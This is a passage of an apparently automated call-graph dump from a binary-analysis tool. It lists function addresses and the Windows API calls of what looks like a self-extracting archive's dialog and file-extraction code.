50b90c TranslateMessage DispatchMessageW 23821->23827 23829 4fe617 53 API calls 23823->23829 23824->23781 23828 50be79 23825->23828 23827->23808 23830 4fe617 53 API calls 23828->23830 23832 50ba17 23829->23832 23833 50be9c _wcslen 23830->23833 23831 50bff0 23837 50c020 23831->23837 23840 4fe617 53 API calls 23831->23840 23838 4f4092 _swprintf 51 API calls 23832->23838 23871 4fe617 53 API calls 23833->23871 23892 50beed 23833->23892 23834 50b9d9 23953 4fa0b1 23834->23953 23836 50c73f 97 API calls 23836->23831 23841 50c0d8 23837->23841 23848 50c73f 97 API calls 23837->23848 23842 50ba29 23838->23842 23847 50c003 SetDlgItemTextW 23840->23847 23844 50c18b 23841->23844 23882 50c169 23841->23882 23891 4fe617 53 API calls 23841->23891 23843 50d4d4 16 API calls 23842->23843 23843->23834 23849 50c194 EnableWindow 23844->23849 23850 50c19d 23844->23850 23845 50ba68 GetLastError 23846 50ba73 23845->23846 23959 50ac04 SetCurrentDirectoryW 23846->23959 23851 4fe617 53 API calls 23847->23851 23853 50c03b 23848->23853 23849->23850 23860 50c1ba 23850->23860 24074 4f12d3 GetDlgItem EnableWindow 23850->24074 23854 50c017 SetDlgItemTextW 23851->23854 23857 50c04d 23853->23857 23889 50c072 23853->23889 23854->23837 23855 50ba87 23862 50ba90 GetLastError 23855->23862 23863 50ba9e 23855->23863 23856 4fe617 53 API calls 23856->23781 24072 509ed5 32 API calls 23857->24072 23858 50c0cb 23864 50c73f 97 API calls 23858->23864 23861 50c1e1 23860->23861 23875 50c1d9 SendMessageW 23860->23875 23861->23781 23870 4fe617 53 API calls 23861->23870 23862->23863 23865 50bb11 23863->23865 23868 50bb20 23863->23868 23869 50baae GetTickCount 23863->23869 23864->23841 23865->23868 23872 50bd56 23865->23872 23867 50c1b0 24075 4f12d3 GetDlgItem EnableWindow 23867->24075 23879 50bcfb 23868->23879 23880 50bcf1 23868->23880 23881 50bb39 GetModuleFileNameW 23868->23881 23877 4f4092 _swprintf 51 API calls 23869->23877 23870->23813 23878 50bed0 23871->23878 23975 4f12f1 GetDlgItem ShowWindow 23872->23975 23873 50c066 23873->23889 23875->23861 23884 50bac7 23877->23884 23885 4f4092 _swprintf 51 API calls 23878->23885 23888 4fe617 53 API calls 23879->23888 23880->23788 23880->23879 24066 4ff28c 82 API calls 23881->24066 24073 509ed5 32 API calls 23882->24073 23883 50bd66 23976 4f12f1 GetDlgItem ShowWindow 23883->23976 23960 4f966e 23884->23960 23885->23892 23895 50bd05 23888->23895 23889->23858 23896 50c73f 97 API calls 23889->23896 23891->23841 23892->23856 23893 50bb5f 23898 4f4092 _swprintf 51 API calls 23893->23898 23894 50c188 23894->23844 23899 4f4092 _swprintf 51 API calls 23895->23899 23900 50c0a0 23896->23900 23897 50bd70 23901 4fe617 53 API calls 23897->23901 23903 50bb81 CreateFileMappingW 23898->23903 23904 50bd23 23899->23904 23900->23858 23905 50c0a9 DialogBoxParamW 23900->23905 23906 50bd7a SetDlgItemTextW 23901->23906 23908 50bbe3 GetCommandLineW 23903->23908 23936 50bc60 __InternalCxxFrameHandler 23903->23936 23916 4fe617 53 API calls 23904->23916 23905->23788 23905->23858 23977 4f12f1 GetDlgItem ShowWindow 23906->23977 23907 50baed 23910 50baff 23907->23910 23911 50baf4 GetLastError 23907->23911 23912 50bbf4 23908->23912 23968 4f959a 23910->23968 23911->23910 24067 50b425 SHGetMalloc 23912->24067 23913 50bd8c SetDlgItemTextW GetDlgItem 23917 50bdc1 23913->23917 23918 50bda9 GetWindowLongW SetWindowLongW 23913->23918 23920 50bd3d 23916->23920 23978 50c73f 23917->23978 23918->23917 23919 50bc10 24068 50b425 SHGetMalloc 23919->24068 23924 50bc1c 24069 50b425 SHGetMalloc 23924->24069 23925 50c73f 97 API calls 23927 50bddd 23925->23927 24003 50da52 23927->24003 23928 50bc28 24070 4ff3fa 82 API calls 2 library calls 23928->24070 23929 50bccb 23929->23880 23935 50bce1 UnmapViewOfFile CloseHandle 23929->23935 23932 50bc3f MapViewOfFile 23932->23936 23934 50c73f 97 API calls 23940 50be03 23934->23940 23935->23880 23936->23929 23937 50bcb7 Sleep 23936->23937 23937->23929 23937->23936 23938 50be2c 24071 4f12d3 GetDlgItem EnableWindow 23938->24071 23940->23938 23942 50c73f 97 API calls 23940->23942 23941->23788 23941->23814 23942->23938 23944 4f131f 23943->23944 23945 4f1378 23943->23945 23946 4f1385 23944->23946 24076 4fe2e8 62 API calls 2 library calls 23944->24076 24077 4fe2c1 GetWindowLongW SetWindowLongW 23945->24077 23946->23781 23946->23782 23946->23783 23949 4f1341 23949->23946 23950 4f1354 GetDlgItem 23949->23950 23950->23946 23951 4f1364 23950->23951 23951->23946 23952 4f136a SetWindowTextW 23951->23952 23952->23946 23956 4fa0bb 23953->23956 23954 4fa14c 23955 4fa2b2 8 API calls 23954->23955 23957 4fa175 23954->23957 23955->23957 23956->23954 23956->23957 24078 4fa2b2 23956->24078 23957->23845 23957->23846 23959->23855 23961 4f9678 23960->23961 23962 4f96d5 CreateFileW 23961->23962 23963 4f96c9 23961->23963 23962->23963 23964 4f971f 23963->23964 23965 4fbb03 GetCurrentDirectoryW 23963->23965 23964->23907 23966 4f9704 23965->23966 23966->23964 23967 4f9708 CreateFileW 23966->23967 23967->23964 23969 4f95be 23968->23969 23974 4f95cf 23968->23974 23970 4f95ca 23969->23970 23971 4f95d1 23969->23971 23969->23974 24099 4f974e 23970->24099 24104 4f9620 23971->24104 23974->23865 23975->23883 23976->23897 23977->23913 23979 50c749 __EH_prolog 23978->23979 23980 50bdcf 23979->23980 23981 50b314 ExpandEnvironmentStringsW 23979->23981 23980->23925 23987 50c780 _wcslen _wcsrchr 23981->23987 23983 50b314 ExpandEnvironmentStringsW 23983->23987 23984 50ca67 SetWindowTextW 23984->23987 23987->23980 23987->23983 23987->23984 23988 513e3e 22 API calls 23987->23988 23990 50c855 SetFileAttributesW 23987->23990 23995 50cc31 GetDlgItem SetWindowTextW SendMessageW 23987->23995 23998 50cc71 SendMessageW 23987->23998 24119 501fbb CompareStringW 23987->24119 24120 50a64d GetCurrentDirectoryW 23987->24120 24122 4fa5d1 6 API calls 23987->24122 24123 4fa55a FindClose 23987->24123 24124 50b48e 76 API calls 2 library calls 23987->24124 23988->23987 23991 50c90f GetFileAttributesW 23990->23991 24002 50c86f _abort _wcslen 23990->24002 23991->23987 23994 50c921 DeleteFileW 23991->23994 23994->23987 23996 50c932 23994->23996 23995->23987 23997 4f4092 _swprintf 51 API calls 23996->23997 23999 50c952 GetFileAttributesW 23997->23999 23998->23987 23999->23996 24000 50c967 MoveFileW 23999->24000 24000->23987 24001 50c97f MoveFileExW 24000->24001 24001->23987 24002->23987 24002->23991 24121 4fb991 51 API calls 3 library calls 24002->24121 24004 50da5c __EH_prolog 24003->24004 24125 500659 24004->24125 24006 50da8d 24129 4f5b3d 24006->24129 24008 50daab 24133 4f7b0d 24008->24133 24012 50dafe 24149 4f7b9e 24012->24149 24014 50bdee 24014->23934 24016 50d6a8 24015->24016 24631 50a5c6 24016->24631 24019 50d6b5 GetWindow 24020 50d6d5 24019->24020 24021 50bf15 24019->24021 24020->24021 24022 50d6e2 GetClassNameW 24020->24022 24024 50d706 GetWindowLongW 24020->24024 24025 50d76a GetWindow 24020->24025 24021->23790 24021->23791 24636 501fbb CompareStringW 24022->24636 24024->24025 24026 50d716 SendMessageW 24024->24026 24025->24020 24025->24021 24026->24025 24027 50d72c GetObjectW 24026->24027 24637 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24027->24637 24029 50d743 24638 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24029->24638 24639 50a80c 8 API calls 24029->24639 24032 50d754 SendMessageW DeleteObject 24032->24025 24033->23806 24035 50abf1 24034->24035 24036 50abcc 24034->24036 24037 50abf6 SHAutoComplete 24035->24037 24038 50abff 24035->24038 24642 501fbb CompareStringW 24036->24642 24037->24038 24042 50b093 24038->24042 24040 50abdf 24040->24035 24041 50abe3 FindWindowExW 24040->24041 24041->24035 24043 50b09d __EH_prolog 24042->24043 24044 4f13dc 84 API calls 24043->24044 24045 50b0bf 24044->24045 24643 4f1fdc 24045->24643 24048 50b0d9 24051 4f1692 86 API calls 24048->24051 24049 50b0eb 24050 4f19af 128 API calls 24049->24050 24054 50b10d __InternalCxxFrameHandler ___std_exception_copy 24050->24054 24052 50b0e4 24051->24052 24052->23831 24052->23836 24053 4f1692 86 API calls 24053->24052 24054->24053 24055->23813 24057 50b568 5 API calls 24056->24057 24058 50d4e0 GetDlgItem 24057->24058 24059 50d502 24058->24059 24060 50d536 SendMessageW SendMessageW 24058->24060 24063 50d50d ShowWindow SendMessageW SendMessageW 24059->24063 24061 50d591 SendMessageW SendMessageW SendMessageW 24060->24061 24062 50d572 24060->24062 24064 50d5c4 SendMessageW 24061->24064 24065 50d5e7 SendMessageW 24061->24065 24062->24061 24063->24060 24064->24065 24065->23834 24066->23893 24067->23919 24068->23924 24069->23928 24070->23932 24071->23941 24072->23873 24073->23894 24074->23867 24075->23860 24076->23949 24077->23946 24080 4fa2bf 24078->24080 24079 4fa2e3 24082 4fa231 3 API calls 24079->24082 24080->24079 24081 4fa2d6 CreateDirectoryW 24080->24081 24081->24079 24083 4fa316 24081->24083 24084 4fa2e9 24082->24084 24086 4fa325 24083->24086 24091 4fa4ed 24083->24091 24085 4fa329 GetLastError 24084->24085 24087 4fbb03 GetCurrentDirectoryW 24084->24087 24085->24086 24086->23956 24089 4fa2ff 24087->24089 24089->24085 24090 4fa303 CreateDirectoryW 24089->24090 24090->24083 24090->24085 24092 50ec50 24091->24092 24093 4fa4fa SetFileAttributesW 24092->24093 24094 4fa53d 24093->24094 24095 4fa510 24093->24095 24094->24086 24096 4fbb03 GetCurrentDirectoryW 24095->24096 24097 4fa524 24096->24097 24097->24094 24098 4fa528 SetFileAttributesW 24097->24098 24098->24094 24100 4f9757 24099->24100 24101 4f9781 24099->24101 24100->24101 24110 4fa1e0 24100->24110 24101->23974 24105 4f964a 24104->24105 24106 4f962c 24104->24106 24107 4f9669 24105->24107 24118 4f6bd5 76 API calls 24105->24118 24106->24105 24108 4f9638 CloseHandle 24106->24108 24107->23974 24108->24105 24111 50ec50 24110->24111 24112 4fa1ed DeleteFileW 24111->24112 24113 4f977f 24112->24113 24114 4fa200 24112->24114 24113->23974 24115 4fbb03 GetCurrentDirectoryW 24114->24115 24116 4fa214 24115->24116 24116->24113 24117 4fa218 DeleteFileW 24116->24117 24117->24113 24118->24107 24119->23987 24120->23987 24121->24002 24122->23987 24123->23987 24124->23987 24126 500666 _wcslen 24125->24126 24153 4f17e9 24126->24153 24128 50067e 24128->24006 24130 500659 _wcslen 24129->24130 24131 4f17e9 78 API calls 24130->24131 24132 50067e 24131->24132 24132->24008 24134 4f7b17 __EH_prolog 24133->24134 24170 4fce40 24134->24170 24136 4f7b32 24176 50eb38 24136->24176 24138 4f7b5c 24185 504a76 24138->24185 24141 4f7c7d 24142 4f7c87 24141->24142 24144 4f7cf1 24142->24144 24217 4fa56d 24142->24217 24147 4f7d50 24144->24147 24195 4f8284 24144->24195 24145 4f7d92 24145->24012 24147->24145 24223 4f138b 74 API calls 24147->24223 24150 4f7bac 24149->24150 24152 4f7bb3 24149->24152 24151 502297 86 API calls 24150->24151 24151->24152 24154 4f17ff 24153->24154 24165 4f185a __InternalCxxFrameHandler 24153->24165 24155 4f1828 24154->24155 24166 4f6c36 76 API calls __vswprintf_c_l 24154->24166 24157 4f1887 24155->24157 24158 4f1847 ___std_exception_copy 24155->24158 24160 513e3e 22 API calls 24157->24160 24158->24165 24168 4f6ca7 75 API calls 24158->24168 24159 4f181e 24167 4f6ca7 75 API calls 24159->24167 24162 4f188e 24160->24162 24162->24165 24169 4f6ca7 75 API calls 24162->24169 24165->24128 24166->24159 24167->24155 24168->24165 24169->24165 24171 4fce4a __EH_prolog 24170->24171 24172 50eb38 8 API calls 24171->24172 24173 4fce8d 24172->24173 24174 50eb38 8 API calls 24173->24174 24175 4fceb1 24174->24175 24175->24136 24178 50eb3d ___std_exception_copy 24176->24178 24177 50eb57 24177->24138 24178->24177 24181 50eb59 24178->24181 24191 517a5e 7 API calls 2 library calls 24178->24191 24180 50f5c9 24193 51238d RaiseException 24180->24193 24181->24180 24192 51238d RaiseException 24181->24192 24184 50f5e6 24186 504a80 __EH_prolog 24185->24186 24187 50eb38 8 API calls 24186->24187 24188 504a9c 24187->24188 24189 4f7b8b 24188->24189 24194 500e46 80 API calls 24188->24194 24189->24141 24191->24178 24192->24180 24193->24184 24194->24189 24196 4f828e __EH_prolog 24195->24196 24224 4f13dc 24196->24224 24198 4f82aa 24199 4f82bb 24198->24199 24364 4f9f42 24198->24364 24202 4f82f2 24199->24202 24232 4f1a04 24199->24232 24360 4f1692 24202->24360 24205 4f8389 24251 4f8430 24205->24251 24209 4f83e8 24256 4f1f6d 24209->24256 24212 4f82ee 24212->24202 24212->24205 24215 4fa56d 7 API calls 24212->24215 24368 4fc0c5 CompareStringW _wcslen 24212->24368 24213 4f83f3 24213->24202 24260 4f3b2d 24213->24260 24272 4f848e 24213->24272 24215->24212 24218 4fa582 24217->24218 24222 4fa5b0 24218->24222 24620 4fa69b 24218->24620 24220 4fa592 24221 4fa597 FindClose 24220->24221 24220->24222 24221->24222 24222->24142 24223->24145 24225 4f13e1 __EH_prolog 24224->24225 24226 4fce40 8 API calls 24225->24226 24227 4f1419 24226->24227 24228 50eb38 8 API calls 24227->24228 24231 4f1474 _abort 24227->24231 24229 4f1461 24228->24229 24230 4fb505 84 API calls 24229->24230 24229->24231 24230->24231 24231->24198 24233 4f1a0e __EH_prolog 24232->24233 24245 4f1b9b 24233->24245 24246 4f1a61 24233->24246 24370 4f13ba 24233->24370 24236 4f1bc7 24382 4f138b 74 API calls 24236->24382 24238 4f3b2d 101 API calls 24241 4f1c12 24238->24241 24239 4f1bd4 24239->24238 24239->24245 24240 4f1c5a 24244 4f1c8d 24240->24244 24240->24245 24383 4f138b 74 API calls 24240->24383 24241->24240 24243 4f3b2d 101 API calls 24241->24243 24243->24241 24244->24245 24249 4f9e80 79 API calls 24244->24249 24245->24212 24246->24236 24246->24239 24246->24245 24247 4f1cde 24247->24245 24248 4f3b2d 101 API calls 24247->24248 24248->24247 24249->24247 24403 4fcf3d 24251->24403 24253 4f8440 24407 5013d2 GetSystemTime SystemTimeToFileTime 24253->24407 24255 4f83a3 24255->24209 24369 501b66 72 API calls 24255->24369 24257 4f1f72 __EH_prolog 24256->24257 24259 4f1fa6 24257->24259 24412 4f19af 24257->24412 24259->24213 24261 4f3b3d 24260->24261 24262 4f3b39 24260->24262 24271 4f9e80 79 API calls 24261->24271 24262->24213 24263 4f3b4f 24264 4f3b6a 24263->24264 24265 4f3b78 24263->24265 24266 4f3baa 24264->24266 24542 4f32f7 89 API calls 2 library calls 24264->24542 24543 4f286b 101 API calls 3 library calls 24265->24543 24266->24213 24269 4f3b76 24269->24266 24544 4f20d7 74 API calls 24269->24544 24271->24263 24273 4f8498 __EH_prolog 24272->24273 24278 4f84d5 24273->24278 24308 4f8513 24273->24308 24569 508c8d 103 API calls 24273->24569 24275 4f84f5 24276 4f84fa 24275->24276 24277 4f851c 24275->24277 24276->24308 24570 4f7a0d 152 API calls 24276->24570 24277->24308 24571 508c8d 103 API calls 24277->24571 24278->24275 24281 4f857a 24278->24281 24278->24308 24281->24308 24545 4f5d1a 24281->24545 24283 4f8605 24283->24308 24551 4f8167 24283->24551 24285 4f8797 24287 4fa56d 7 API calls 24285->24287 24288 4f8802 24285->24288 24287->24288 24557 4f7c0d 24288->24557 24290 4fd051 82 API calls 24296 4f885d 24290->24296 24291 4f898b 24574 4f2021 74 API calls 24291->24574 24292 4f8a5f 24297 4f8ab6 24292->24297 24313 4f8a6a 24292->24313 24293 4f8992 24293->24292 24299 4f89e1 24293->24299 24296->24290 24296->24291 24296->24293 24296->24308 24572 4f8117 84 API calls 24296->24572 24573 4f2021 74 API calls 24296->24573 24304 4f8a4c 24297->24304 24577 4f7fc0 97 API calls 24297->24577 24298 4f8ab4 24305 4f959a 80 API calls 24298->24305 24301 4f8b14 24299->24301 24299->24304 24306 4fa231 3 API calls 24299->24306 24300 4f9105 24303 4f959a 80 API calls 24300->24303 24301->24300 24302 4f8b82 24301->24302 24578 4f98bc 24301->24578 24311 4fab1a 8 API calls 24302->24311 24303->24308 24304->24298 24304->24301 24305->24308 24309 4f8a19 24306->24309 24308->24213 24309->24304 24575 4f92a3 97 API calls 24309->24575 24314 4f8bd1 24311->24314 24313->24298 24576 4f7db2 101 API calls 24313->24576 24316 4fab1a 8 API calls 24314->24316 24331 4f8be7 24316->24331 24319 4f8b70 24582 4f6e98 77 API calls 24319->24582 24321 4f8cbc 24322 4f8d18 24321->24322 24323 4f8e40 24321->24323 24324 4f8d8a 24322->24324 24325 4f8d28 24322->24325 24326 4f8e66 24323->24326 24327 4f8e52 24323->24327 24346 4f8d49 24323->24346 24332 4f8167 19 API calls 24324->24332 24328 4f8d6e 24325->24328 24336 4f8d37 24325->24336 24330 503377 75 API calls 24326->24330 24329 4f9215 123 API calls 24327->24329 24328->24346 24585 4f77b8 111 API calls 24328->24585 24329->24346 24333 4f8e7f 24330->24333 24331->24321 24334 4f8c93 24331->24334 24341 4f981a 79 API calls 24331->24341 24335 4f8dbd 24332->24335 24588 503020 123 API calls 24333->24588 24334->24321 24583 4f9a3c 82 API calls 24334->24583 24342 4f8de6 24335->24342 24343 4f8df5 24335->24343 24335->24346 24584 4f2021 74 API calls 24336->24584 24341->24334 24586 4f7542 85 API calls 24342->24586 24587 4f9155 93 API calls __EH_prolog 24343->24587 24349 4f8f85 24346->24349 24589 4f2021 74 API calls 24346->24589 24348 4f9090 24348->24300 24351 4fa4ed 3 API calls 24348->24351 24349->24300 24349->24348 24350 4f903e 24349->24350 24563 4f9f09 SetEndOfFile 24349->24563 24564 4f9da2 24350->24564 24354 4f90eb 24351->24354 24354->24300 24590 4f2021 74 API calls 24354->24590 24355 4f9085 24357 4f9620 77 API calls 24355->24357 24357->24348 24358 4f90fb 24591 4f6dcb 76 API calls _wcschr 24358->24591 24361 4f16a4 24360->24361 24607 4fcee1 24361->24607 24365 4f9f59 24364->24365 24366 4f9f63 24365->24366 24619 4f6d0c 78 API calls 24365->24619 24366->24199 24368->24212 24369->24209 24384 4f1732 24370->24384 24372 4f13d6 24373 4f9e80 24372->24373 24374 4f9ea5 24373->24374 24375 4f9e92 24373->24375 24376 4f9eb0 24374->24376 24378 4f9eb8 SetFilePointer 24374->24378 24375->24376 24401 4f6d5b 77 API calls 24375->24401 24376->24246 24378->24376 24379 4f9ed4 GetLastError 24378->24379 24379->24376 24380 4f9ede 24379->24380 24380->24376 24402 4f6d5b 77 API calls 24380->24402 24382->24245 24383->24244 24385 4f1748 24384->24385 24394 4f17a0 __InternalCxxFrameHandler 24384->24394 24386 4f1771 24385->24386 24397 4f6c36 76 API calls __vswprintf_c_l 24385->24397 24388 4f17c7 24386->24388 24393 4f178d ___std_exception_copy 24386->24393 24390 513e3e 22 API calls 24388->24390 24389 4f1767 24398 4f6ca7 75 API calls 24389->24398 24392 4f17ce 24390->24392 24392->24394 24400 4f6ca7 75 API calls 24392->24400 24393->24394 24399 4f6ca7 75 API calls 24393->24399 24394->24372 24397->24389 24398->24386 24399->24394 24400->24394 24401->24374 24402->24376 24404 4fcf4d 24403->24404 24406 4fcf54 24403->24406 24408 4f981a 24404->24408 24406->24253 24407->24255 24409 4f9833 24408->24409 24411 4f9e80 79 API calls 24409->24411 24410 4f9865 24410->24406 24411->24410 24413 4f19bf 24412->24413 24415 4f19bb 24412->24415 24416 4f18f6 24413->24416 24415->24259 24417 4f1908 24416->24417 24418 4f1945 24416->24418 24419 4f3b2d 101 API calls 24417->24419 24424 4f3fa3 24418->24424 24422 4f1928 24419->24422 24422->24415 24428 4f3fac 24424->24428 24425 4f3b2d 101 API calls 24425->24428 24426 4f1966 24426->24422 24429 4f1e50 24426->24429 24428->24425 24428->24426 24441 500e08 24428->24441 24430 4f1e5a __EH_prolog 24429->24430 24449 4f3bba 24430->24449 24432 4f1e84 24433 4f1732 78 API calls 24432->24433 24437 4f1f0b 24432->24437 24434 4f1e9b 24433->24434 24477 4f18a9 78 API calls 24434->24477 24436 4f1eb3 24439 4f1ebf _wcslen 24436->24439 24478 501b84 MultiByteToWideChar 24436->24478 24437->24422 24479 4f18a9 78 API calls 24439->24479 24442 500e0f 24441->24442 24443 500e2a 24442->24443 24447 4f6c31 RaiseException CallUnexpected 24442->24447 24445 500e3b SetThreadExecutionState 24443->24445 24448 4f6c31 RaiseException CallUnexpected 24443->24448 24445->24428 24447->24443 24448->24445 24450 4f3bc4 __EH_prolog 24449->24450 24451 4f3bda 24450->24451 24452 4f3bf6 24450->24452 24505 4f138b 74 API calls 24451->24505 24454 4f3e51 24452->24454 24457 4f3c22 24452->24457 24522 4f138b 74 API calls 24454->24522 24456 4f3be5 24456->24432 24457->24456 24480 503377 24457->24480 24459 4f3ca3 24460 4f3d2e 24459->24460 24476 4f3c9a 24459->24476 24508 4fd051 24459->24508 24490 4fab1a 24460->24490 24461 4f3c9f 24461->24459 24507 4f20bd 78 API calls 24461->24507 24463 4f3c8f 24506 4f138b 74 API calls 24463->24506 24464 4f3c71 24464->24459 24464->24461 24464->24463 24467 4f3d41 24470 4f3dd7 24467->24470 24471 4f3dc7 24467->24471 24514 503020 123 API calls 24470->24514 24494 4f9215 24471->24494 24474 4f3dd5 24474->24476 24515 4f2021 74 API calls 24474->24515 24516 502297 24476->24516 24477->24436 24478->24439 24479->24437 24481 50338c 24480->24481 24483 503396 ___std_exception_copy 24480->24483 24523 4f6ca7 75 API calls 24481->24523 24484 50341c 24483->24484 24485 5034c6 24483->24485 24488 503440 _abort 24483->24488 24524 5032aa 75 API calls 3 library calls 24484->24524 24525 51238d RaiseException 24485->24525 24488->24464 24489 5034f2 24491 4fab28 24490->24491 24493 4fab32 24490->24493 24492 50eb38 8 API calls 24491->24492 24492->24493 24493->24467 24495 4f921f __EH_prolog 24494->24495 24526 4f7c64 24495->24526 24498 4f13ba 78 API calls 24499 4f9231 24498->24499 24529 4fd114 24499->24529 24501 4f928a 24501->24474 24503 4fd114 118 API calls 24504 4f9243 24503->24504 24504->24501 24504->24503 24538 4fd300 97 API calls __InternalCxxFrameHandler 24504->24538 24505->24456 24506->24476 24507->24459 24509 4fd084 24508->24509 24510 4fd072 24508->24510 24540 4f603a 82 API calls 24509->24540 24539 4f603a 82 API calls 24510->24539 24513 4fd07c 24513->24460 24514->24474 24515->24476 24517 5022a1 24516->24517 24518 5022ba 24517->24518 24521 5022ce 24517->24521 24541 500eed 86 API calls 24518->24541 24520 5022c1 24520->24521 24522->24456 24523->24483 24524->24488 24525->24489 24527 4fb146 GetVersionExW 24526->24527 24528 4f7c69 24527->24528 24528->24498 24535 4fd12a __InternalCxxFrameHandler 24529->24535 24530 4fd29a 24531 4fd2ce 24530->24531 24532 4fd0cb 6 API calls 24530->24532 24533 500e08 SetThreadExecutionState RaiseException 24531->24533 24532->24531 24536 4fd291 24533->24536 24534 508c8d 103 API calls 24534->24535 24535->24530 24535->24534 24535->24536 24537 4fac05 91 API calls 24535->24537 24536->24504 24537->24535 24538->24504 24539->24513 24540->24513 24541->24520 24542->24269 24543->24269 24544->24266 24546 4f5d2a 24545->24546 24592 4f5c4b 24546->24592 24548 4f5d95 24548->24283 24549 4f5d5d 24549->24548 24597 4fb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24549->24597 24552 4f8186 24551->24552 24553 4f8232 24552->24553 24604 4fbe5e 19 API calls __InternalCxxFrameHandler 24552->24604 24603 501fac CharUpperW 24553->24603 24556 4f823b 24556->24285 24559 4f7c22 24557->24559 24558 4f7c5a 24558->24296 24559->24558 24605 4f6e7a 74 API calls 24559->24605 24561 4f7c52 24606 4f138b 74 API calls 24561->24606 24563->24350 24565 4f9db3 24564->24565 24568 4f9dc2 24564->24568 24566 4f9db9 FlushFileBuffers 24565->24566 24565->24568 24566->24568 24567 4f9e3f SetFileTime 24567->24355 24568->24567 24569->24278 24570->24308 24571->24308 24572->24296 24573->24296 24574->24293 24575->24304 24576->24298 24577->24304 24579 4f98c5 GetFileType 24578->24579 24580 4f8b5a 24578->24580 24579->24580 24580->24302 24581 4f2021 74 API calls 24580->24581 24581->24319 24582->24302 24583->24321 24584->24346 24585->24346 24586->24346 24587->24346 24588->24346 24589->24349 24590->24358 24591->24300 24598 4f5b48 24592->24598 24594 4f5c6c 24594->24549 24596 4f5b48 2 API calls 24596->24594 24597->24549 24600 4f5b52 24598->24600 24599 4f5c3a 24599->24594 24599->24596 24600->24599 24602 4fb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24600->24602 24602->24600 24603->24556 24604->24553 24605->24561 24606->24558 24608 4fcef2 24607->24608 24613 4fa99e 24608->24613 24610 4fcf24 24611 4fa99e 86 API calls 24610->24611 24612 4fcf2f 24611->24612 24614 4fa9c1 24613->24614 24617 4fa9d5 24613->24617 24618 500eed 86 API calls 24614->24618 24616 4fa9c8 24616->24617 24617->24610 24618->24616 24619->24366 24621 4fa6a8 24620->24621 24622 4fa727 FindNextFileW 24621->24622 24623 4fa6c1 FindFirstFileW 24621->24623 24624 4fa732 GetLastError 24622->24624 24630 4fa709 24622->24630 24625 4fa6d0 24623->24625 24623->24630 24624->24630 24626 4fbb03 GetCurrentDirectoryW 24625->24626 24627 4fa6e0 24626->24627 24628 4fa6fe GetLastError 24627->24628 24629 4fa6e4 FindFirstFileW 24627->24629 24628->24630 24629->24628 24629->24630 24630->24220 24640 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24631->24640 24633 50a5cd 24634 50a5d9 24633->24634 24641 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24633->24641 24634->24019 24634->24021 24636->24020 24637->24029 24638->24029 24639->24032 24640->24633 24641->24634 24642->24040 24644 4f9f42 78 API calls 24643->24644 24645 4f1fe8 24644->24645 24646 4f1a04 101 API calls 24645->24646 24649 4f2005 24645->24649 24647 4f1ff5 24646->24647 24647->24649 24650 4f138b 74 API calls 24647->24650 24649->24048 24649->24049 24650->24649 25346 5094e0 GetClientRect 25376 5021e0 26 API calls std::bad_exception::bad_exception 25396 50f2e0 46 API calls __RTC_Initialize 25397 51bee0 GetCommandLineA GetCommandLineW 24665 50eae7 24666 50eaf1 24665->24666 24667 50e85d ___delayLoadHelper2@8 14 API calls 24666->24667 24668 50eafe 24667->24668 25347 50f4e7 29 API calls _abort 25377 4f95f0 80 API calls 25398 4f5ef0 82 API calls 25349 51b49d 6 API calls CatchGuardHandler 25378 509580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25399 50c793 102 API calls 5 library calls 25352 50c793 97 API calls 4 library calls 25380 50b18d 78 API calls 25381 50b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24825 50f3b2 24826 50f3be ___scrt_is_nonwritable_in_current_image 24825->24826 24857 50eed7 24826->24857 24828 50f3c5 24829 50f518 24828->24829 24832 50f3ef 24828->24832 24930 50f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24829->24930 24831 50f51f 24923 517f58 24831->24923 24844 50f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24832->24844 24868 518aed 24832->24868 24839 50f40e 24841 50f48f 24876 50f953 GetStartupInfoW _abort 24841->24876 24843 50f495 24877 518a3e 51 API calls 24843->24877 24844->24841 24926 517af4 38 API calls _abort 24844->24926 24847 50f49d 24878 50df1e 24847->24878 24851 50f4b1 24851->24831 24852 50f4b5 24851->24852 24853 50f4be 24852->24853 24928 517efb 28 API calls _abort 24852->24928 24929 50f048 12 API calls ___scrt_uninitialize_crt 24853->24929 24856 50f4c6 24856->24839 24858 50eee0 24857->24858 24932 50f654 IsProcessorFeaturePresent 24858->24932 24860 50eeec 24933 512a5e 24860->24933 24862 50eef1 24863 50eef5 24862->24863 24941 518977 24862->24941 24863->24828 24866 50ef0c 24866->24828 24870 518b04 24868->24870 24869 50fbbc CatchGuardHandler 5 API calls 24871 50f408 24869->24871 24870->24869 24871->24839 24872 518a91 24871->24872 24873 518ac0 24872->24873 24874 50fbbc CatchGuardHandler 5 API calls 24873->24874 24875 518ae9 24874->24875 24875->24844 24876->24843 24877->24847 25034 500863 24878->25034 24882 50df3d 25083 50ac16 24882->25083 24884 50df46 _abort 24885 50df59 GetCommandLineW 24884->24885 24886 50dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24885->24886 24887 50df68 24885->24887 24889 4f4092 _swprintf 51 API calls 24886->24889 25087 50c5c4 24887->25087 24890 50e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24889->24890 25098 50b6dd LoadBitmapW 24890->25098 24893 50dfe0 25092 50dbde 24893->25092 24894 50df76 OpenFileMappingW 24896 50dfd6 CloseHandle 24894->24896 24897 50df8f MapViewOfFile 24894->24897 24896->24886 24900 50dfa0 __InternalCxxFrameHandler 24897->24900 24901 50dfcd UnmapViewOfFile 24897->24901 24905 50dbde 2 API calls 24900->24905 24901->24896 24907 50dfbc 24905->24907 24906 5090b7 8 API calls 24908 50e0aa DialogBoxParamW 24906->24908 24907->24901 24909 50e0e4 24908->24909 24910 50e0f6 Sleep 24909->24910 24911 50e0fd 24909->24911 24910->24911 24914 50e10b 24911->24914 25128 50ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24911->25128 24913 50e12a DeleteObject 24915 50e146 24913->24915 24916 50e13f DeleteObject 24913->24916 24914->24913 24917 